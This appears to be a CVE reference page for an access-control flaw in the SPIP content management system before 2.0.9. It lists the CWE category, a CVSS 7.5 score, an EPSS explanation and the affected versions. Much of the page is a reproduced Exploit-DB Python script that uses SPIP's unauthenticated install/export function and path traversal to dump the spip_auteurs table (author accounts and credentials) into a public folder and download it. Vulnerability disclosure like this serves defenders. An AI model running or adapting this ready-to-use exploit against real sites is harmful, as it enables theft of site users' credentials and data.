Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 9448
Publication date : 2009-08-17 22h00 +00:00
Author : Kernel_Panik
EDB Verified : Yes
#!/usr/bin/env python
# SPIP - Content Management System < 2.0.9 exploit
# https://www.securityfocus.com/bid/36008
# Author : Kernel_Panik
#
import urllib, urllib2
import cookielib
import sys
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
def extract_hash(formulaire):
return formulaire.split("<input name='hash' type='hidden' value='")[1].split("'")[0]
if len(sys.argv) < 3:
print "SPIP < 2.0.9 exploit by Kernel_Panik\n\tUsage: python script.py <Base_url> <filename>"
exit()
filename = sys.argv[2]
base_url = sys.argv[1]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] First request sended..."
formulaire_data = {'action' : 'export_all',
'export[]' : 'spip_auteurs',
'hash' : extract_hash(formulaire),
'arg' : 'start,,../../../IMG/'+filename+'.xml,0,1.3'
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"spip.php", formulaire_data)
print "[+] Formulaire content sended"
send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] Second request sended"
send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] Last request sended"
xml_content = send_request(urlOpener, base_url+"IMG/"+filename+".xml")
print "[+] Xml file obtained"
result = open(filename+".xml", "w")
result.write(xml_content)
result.close()
print "[+] File saved "
# milw0rm.com [2009-08-18]
Products Mentioned
Configuraton 0
Spip>>Spip >> Version 1.9
Spip>>Spip >> Version 1.9
Spip>>Spip >> Version 1.9.1
Spip>>Spip >> Version 1.9.2c
Spip>>Spip >> Version 1.9.2d
Spip>>Spip >> Version 1.9.2g
Spip>>Spip >> Version 1.9.2h
Spip>>Spip >> Version 1.9.alpha1
Spip>>Spip >> Version 2.0
Spip>>Spip >> Version 2.0.0
Spip>>Spip >> Version 2.0.1
Spip>>Spip >> Version 2.0.2
Spip>>Spip >> Version 2.0.3
Spip>>Spip >> Version 2.0.4
Spip>>Spip >> Version 2.0.5
Spip>>Spip >> Version 2.0.6
Spip>>Spip >> Version 2.0.7
Spip>>Spip >> Version 2.0.8
References